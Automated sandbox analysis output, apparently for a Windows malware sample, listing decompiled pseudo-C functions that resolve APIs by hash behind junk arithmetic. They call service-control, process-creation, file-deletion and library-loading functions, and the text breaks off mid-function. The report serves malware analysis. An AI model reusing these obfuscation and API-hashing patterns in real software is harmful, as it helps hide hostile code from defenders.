                                              			E0027AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0026602B(_t21);
                                              				_v12 = 0xcc49;
                                              				_v12 = _v12 << 6;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0x000ca988;
                                              				_v8 = 0x5d85;
                                              				_v8 = _v8 | 0xb9d19a55;
                                              				_v8 = _v8 * 0xd;
                                              				_v8 = _v8 ^ 0x6fa87272;
                                              				E002707A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                              				_t27 = DeleteFileW(_a12); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0027AAA8
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 76c1544a4b2e17f3600b46830ed426b8e0d57605eb32c033d05d0f5b3cce230d
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 33F069B191020CFFDF08DF94DD4A89EBFB8EB40304F108098F805A6250D3B29B649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E00265FB2(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0026602B(_t21);
                                              				_v12 = 0x33d;
                                              				_v12 = _v12 + 0xc3dc;
                                              				_v12 = _v12 | 0x39ccfb02;
                                              				_v12 = _v12 ^ 0x39ccf342;
                                              				_v8 = 0xe8d9;
                                              				_v8 = _v8 * 0x16;
                                              				_v8 = _v8 | 0x4145347f;
                                              				_v8 = _v8 ^ 0x9035ef96;
                                              				_v8 = _v8 ^ 0xd1609914;
                                              				E002707A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                              				_t27 = CloseServiceHandle(_a4); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00266025
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 8702fe4290028545d28765235ed1e57b8eda292c2976730f66d1e1bcb90d30de
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: A5F04FB0C11208FFDB08DFA4ED4689EBFB8EB40300F208198E409A7260E7715F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              C-Code - Quality: 62%
                                              			E006B2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t30;
                                              				void* _t39;
                                              				signed int _t41;
                                              				signed int _t42;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(0);
                                              				_push(0);
                                              				E006B602B(_t30);
                                              				_v12 = 0x5e3c;
                                              				_t41 = 0x63;
                                              				_v12 = _v12 / _t41;
                                              				_t42 = 0x2f;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x000064be;
                                              				_v8 = 0x74da;
                                              				_v8 = _v8 | 0xfefeeaea;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x000fb531;
                                              				E006C07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                              				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                              				return _t39;
                                              			}










                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006B29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 87ca6e28325270c0f8dd1ab884993b8c649cbaf164d026b19b9ecf187a5ecf5e
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: 95015B72A00108BBEB18DF95DC0A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E006BC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t29;
                                              				intOrPtr* _t33;
                                              				void* _t34;
                                              
                                              				E006B602B(_t29);
                                              				_v28 = 0x4fe02f;
                                              				_v24 = 0x232390;
                                              				_v20 = 0xf8460;
                                              				_v16 = 0;
                                              				_v12 = 0xf625;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 >> 0xa;
                                              				_v12 = _v12 + 0xffffcc6f;
                                              				_v12 = _v12 ^ 0xffffa5b6;
                                              				_v8 = 0xe5cd;
                                              				_v8 = _v8 + 0xffffae4d;
                                              				_v8 = _v8 | 0xf8bbefe7;
                                              				_v8 = _v8 ^ 0xf8bbcc9a;
                                              				_t33 = E006C07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                              				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                              				return _t34;
                                              			}













                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006BC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: e7f4bfcbdc865569de5dcd09002db090fadf255c61100a79e6c09435298ededf
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 5F1133B290122DBBCB25DF95DD498EFBFB9EF04714F108188F90962210D3714B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E006B1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t33;
                                              				struct HINSTANCE__* _t40;
                                              				signed int _t42;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E006B602B(_t33);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x1b2eda;
                                              				_v20 = 0x33a3b7;
                                              				_v12 = 0x98c;
                                              				_v12 = _v12 + 0xb426;
                                              				_v12 = _v12 + 0x5beb;
                                              				_t42 = 0x63;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x00000fce;
                                              				_v8 = 0x120e;
                                              				_v8 = _v8 + 0xfffffcb8;
                                              				_v8 = _v8 + 0xffffefaa;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 ^ 0x07ff9a02;
                                              				E006C07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                              				_t40 = LoadLibraryW(_a12); // executed
                                              				return _t40;
                                              			}












                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 006B1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: ab4fc85dc399104e026c2bade10430990369dfb79d1228360e41937a9a87d5b4
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: 08015BB6D01308FBEF44DF94C94AADEBBB1EB54318F10818CE41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E006B4859() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              
                                              				_v12 = 0xafe2;
                                              				_v12 = _v12 * 0x42;
                                              				_v12 = _v12 + 0xffffdd89;
                                              				_v12 = _v12 ^ 0x002d198d;
                                              				_v8 = 0x5b09;
                                              				_v8 = _v8 | 0xa1ea9544;
                                              				_v8 = _v8 * 0x12;
                                              				_v8 = _v8 ^ 0x6283d9c1;
                                              				E006C07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                              				ExitProcess(0);
                                              			}

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 006B48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E006C4F7D(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t17;
                                              				int _t24;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006B602B(_t17);
                                              				_v12 = 0xddd8;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x003e66d8;
                                              				_v8 = 0xcb35;
                                              				_v8 = _v8 ^ 0x7b88573c;
                                              				_v8 = _v8 * 0x59;
                                              				_v8 = _v8 ^ 0xf27e4a21;
                                              				E006C07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                              				_t24 = CloseHandle(_a4); // executed
                                              				return _t24;
                                              			}

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 006C4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 21%
                                              			E006C976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t34;
                                              				int _t39;
                                              				struct _PROCESS_INFORMATION* _t48;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t48 = __edx;
                                              				_push(0);
                                              				_push(_a68);
                                              				_push(0);
                                              				_push(_a60);
                                              				_push(_a56);
                                              				_push(_a52);
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(0);
                                              				_push(0);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E006B602B(_t34);
                                              				_v12 = 0xaff9;
                                              				_v12 = _v12 | 0xcee54bd1;
                                              				_v12 = _v12 + 0x6ed6;
                                              				_v12 = _v12 ^ 0xcee61221;
                                              				_v8 = 0x6229;
                                              				_v8 = _v8 ^ 0x42aa9f31;
                                              				_v8 = _v8 >> 2;
                                              				_v8 = _v8 ^ 0x10aad83f;
                                              				E006C07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                              				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                              				return _t39;
                                              			}

                                              APIs
                                              • CreateProcessW.KERNEL32(006B591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006B591A), ref: 006C9816
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E006BB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t32;
                                              				void* _t38;
                                              				long _t47;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a48);
                                              				_t47 = __edx;
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(0);
                                              				E006B602B(_t32);
                                              				_v8 = 0xfd14;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 * 0x7a;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 ^ 0x00002bef;
                                              				_v12 = 0x4f26;
                                              				_v12 = _v12 | 0xe7e97f76;
                                              				_v12 = _v12 ^ 0xe7e94dbb;
                                              				E006C07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                              				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                              				return _t38;
                                              			}

                                              APIs
                                              • CreateFileW.KERNELBASE(006C0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,006C0668,?,?,?,?), ref: 006BB5FD
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E006C981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				void* _t28;
                                              				void* _t34;
                                              				long _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a16);
                                              				_t34 = __edx;
                                              				_t37 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E006B602B(_t22);
                                              				_v12 = 0xe68;
                                              				_v12 = _v12 * 0x39;
                                              				_v12 = _v12 ^ 0xd1b1d871;
                                              				_v12 = _v12 ^ 0xd1b2fb7e;
                                              				_v8 = 0x629e;
                                              				_v8 = _v8 + 0xfffff5da;
                                              				_v8 = _v8 | 0xbef7b77b;
                                              				_v8 = _v8 ^ 0xbef79fc3;
                                              				E006C07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                              				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                              				return _t28;
                                              			}

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006B87F2,0000CAAE,0000510C,AD82F196), ref: 006C989B
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E006C7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				int _t31;
                                              				signed int _t33;
                                              				struct _SHFILEOPSTRUCTW* _t40;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_t40 = __ecx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006B602B(_t24);
                                              				_v8 = 0xa117;
                                              				_t33 = 0x76;
                                              				_v8 = _v8 / _t33;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 ^ 0x210fe703;
                                              				_v8 = _v8 ^ 0x210fdcea;
                                              				_v12 = 0xf1e9;
                                              				_v12 = _v12 << 9;
                                              				_v12 = _v12 ^ 0x01e3a445;
                                              				E006C07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                              				_t31 = SHFileOperationW(_t40); // executed
                                              				return _t31;
                                              			}

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 006C7C67
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 52%
                                              			E006BF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				void* _t29;
                                              				int _t35;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a20);
                                              				_t35 = __ecx;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006B602B(_t24);
                                              				_v12 = 0xd5a7;
                                              				_v12 = _v12 ^ 0x994cba9d;
                                              				_v12 = _v12 ^ 0x994c19d3;
                                              				_v8 = 0xac88;
                                              				_v8 = _v8 << 3;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 + 0xebed;
                                              				_v8 = _v8 ^ 0x0000ab82;
                                              				E006C07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                              				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                              				return _t29;
                                              			}









                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 006BF6D8
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 7ae64814fe59d1474c649b8b92ba80ac10fca8109dbcf18b754bf2484d2b9249
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: A601E5B6901208BBEF05AF94DD068DF7F75EB05324F148188F90462250D6B25E61DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E006BB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t23;
                                              				intOrPtr* _t27;
                                              				void* _t28;
                                              
                                              				E006B602B(_t23);
                                              				_v12 = 0x9431;
                                              				_v12 = _v12 >> 7;
                                              				_v12 = _v12 ^ 0x0000160f;
                                              				_v8 = 0xc972;
                                              				_v8 = _v8 ^ 0x829e0126;
                                              				_v8 = _v8 + 0x4512;
                                              				_v8 = _v8 + 0xffff18f9;
                                              				_v8 = _v8 ^ 0x829e24c1;
                                              				_t27 = E006C07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                              				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                              				return _t28;
                                              			}









                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006BB759
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: b3345802ca5b0594fddbbe6452ab7c6b61dcf8fad2b4ccc4a0fd8250e6aeb66f
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: F3014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA0566190D3B15E209B61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E006CAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006B602B(_t21);
                                              				_v12 = 0xcc49;
                                              				_v12 = _v12 << 6;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0x000ca988;
                                              				_v8 = 0x5d85;
                                              				_v8 = _v8 | 0xb9d19a55;
                                              				_v8 = _v8 * 0xd;
                                              				_v8 = _v8 ^ 0x6fa87272;
                                              				E006C07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                              				_t27 = DeleteFileW(_a12); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 006CAAA8
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 46e5df3168a12f6c6a64dade59249ba222e6b3969a6c4e1c099599137ed73dbb
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 7EF019B590020CFFDF08EF94DD4A99EBFB5EB45304F10819CF915A6250D3B69B549B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E006B5FB2(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006B602B(_t21);
                                              				_v12 = 0x33d;
                                              				_v12 = _v12 + 0xc3dc;
                                              				_v12 = _v12 | 0x39ccfb02;
                                              				_v12 = _v12 ^ 0x39ccf342;
                                              				_v8 = 0xe8d9;
                                              				_v8 = _v8 * 0x16;
                                              				_v8 = _v8 | 0x4145347f;
                                              				_v8 = _v8 ^ 0x9035ef96;
                                              				_v8 = _v8 ^ 0xd1609914;
                                              				E006C07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                              				_t27 = CloseServiceHandle(_a4); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 006B6025
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: e40e3028aabc697d840f131c60a15e6120ff3e6890bc46fe31bf0bcbb0cae803
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: 3AF04FB0C11208FFEB48DFA0E94689EBFB9EB40300F20819CE409A7260E7719F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              C-Code - Quality: 58%
                                              			E002175AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t43;
                                              				intOrPtr* _t51;
                                              				void* _t52;
                                              				signed int _t54;
